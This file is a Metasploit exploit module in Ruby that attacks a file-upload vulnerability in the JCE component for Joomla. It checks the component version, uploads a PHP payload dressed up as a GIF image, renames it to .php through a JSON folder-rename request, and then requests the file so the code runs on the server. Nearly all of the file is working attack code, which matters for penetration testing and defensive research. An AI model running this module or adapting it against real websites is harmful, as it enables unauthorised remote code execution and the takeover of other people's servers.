##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Joomla Component JCE File Upload Remote Code Execution',
      'Description'    => %q{
          This module exploits a vulnerability in the JCE component for Joomla!, which
      could allow an unauthenticated remote attacker to upload arbitrary files, caused by the
      fails to sufficiently sanitize user-supplied input. Sending specially-crafted HTTP
      request, a remote attacker could exploit this vulnerability to upload a malicious PHP
      script, which could allow the attacker to execute arbitrary PHP code on the vulnerable
      system. This module has been tested successfully on the JCE Editor 1.5.71 and Joomla
      1.5.26.
      },
      'Author'         =>
        [
          'Unknown', # From AmnPardaz Security Group # Vulnerability discovery and PoC
          'Heyder Andrade <eu[at]heyderandrade.org>' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['OSVDB', '74839'],
          ['EDB', '17734'],
          ['BID', '49338']
        ],
      'Payload'        =>
        {
          'Space'       => 4000, # only to prevent error HTTP 414 (Request-URI Too Long)
          'DisableNops' => true,
          'BadChars'    => "#",
          'Keys'        => ['php']
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'Automatic', { }]],
      'Privileged'     => false,
      'DisclosureDate' => 'Aug 2 2012',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('TARGETURI', [true, "Joomla directory path", "/"])
        ])
  end


  def get_version
    # check imgmanager version
    @uri_base 		= normalize_uri(target_uri.path.to_s, 'index.php')
    @vars_get_base 	=  	{
      'option'=> 'com_jce',
      'task'  => 'plugin',
      'plugin'=> 'imgmanager',
      'file'  => 'imgmanager'
    }
    print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")
    res = send_request_cgi({
      'uri' 	  => @uri_base,
      'vars_get' => @vars_get_base,
      'method'  => 'GET',
      'version' => '1.1'
    })

    version = nil
    if (res and res.code == 200)
      res.body.match(%r{^\s+?<title>Image\sManager\s:\s?(.*)<})
      version = $1.nil? ? nil : $1
    end

    return version
  end

  def check
    version = ( get_version || '').to_s

    if (version.match(%r{1\.5\.7\.1[0-4]?}))
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe
  end


  def upload_gif
    # add GIF header
    cmd_php = "GIF89aG\n<?php #{payload.encoded}  ?>"

    # Generate some random strings
    @payload_name  	= rand_text_alpha_lower(6)
    boundary   		= '-' * 27 + rand_text_numeric(11)

    parms 			= {'method'=> 'form'}
    parms.merge!(@vars_get_base)

    # POST data
    post_data = Rex::MIME::Message.new
    post_data.bound = boundary
    post_data.add_part("/", nil, nil, "form-data; name=\"upload-dir\"")
    post_data.add_part("", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"\"")
    post_data.add_part("0", nil, nil, "form-data; name=\"upload-overwrite\"")
    post_data.add_part("#{cmd_php}", "image/gif", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}.gif\"")
    post_data.add_part("#{@payload_name}", nil, nil, "form-data; name=\"upload-name\"")
    post_data.add_part("upload", nil, nil, "form-data; name=\"action\"")

    data = post_data.to_s

    res = send_request_cgi({
      'uri'	  	=> @uri_base,
      'vars_get' 	=> parms,
      'method'  	=> 'POST',
      'version' 	=> '1.1',
      'data'    	=> data,
      'ctype'  	=> "multipart/form-data; boundary=#{post_data.bound}"
    })

    if (res and res.code = 200 )
      return :access_denied if (res.body =~ /RESTRICTED/i)
      print_good("Successfully uploaded #{@payload_name}.gif")
    else
      print_error("Error uploading #{@payload_name}.gif")
      return :abort
    end

    return :success

  end

  def renamed?
    # Rename the file from .gif to .php

    data =	"json={\"fn\":\"folderRename\",\"args\":[\"/#{@payload_name}.gif\",\"#{@payload_name}.php\"]}"

    print_status("Change Extension from #{@payload_name}.gif to #{@payload_name}.php")

    res = send_request_cgi(
      {
        'uri'       => @uri_base,
        'vars_get'	=> @vars_get_base,
        'method'    => 'POST',
        'version'   => '1.1',
        'data' 	    => data,
        'ctype'     => 'application/x-www-form-urlencoded; charset=utf-8',
        'headers'   =>
        {
          'X-Request' => 'JSON'
        }
      })
    if (res and res.code == 200 )
      print_good("Renamed #{@payload_name}.gif to #{@payload_name}.php")
      return true
    else
      print_error("Failed to rename #{@payload_name}.gif to #{@payload_name}.php")
      return false
    end
  end

  def call_payload
    payload = "#{@payload_name}.php"
    print_status("Calling payload: #{payload}")
    uri = normalize_uri(target_uri.path.to_s, "images", "stories", payload)
    res = send_request_cgi({
      'uri'	=> uri,
      'method'    => 'GET',
      'version'   => '1.1'
    })
  end



  def exploit

    return if not check == Exploit::CheckCode::Vulnerable
    if upload_gif == :success
      if renamed?
        register_files_for_cleanup("#{@payload_name}.php")
        call_payload
      end
    end

  end
end
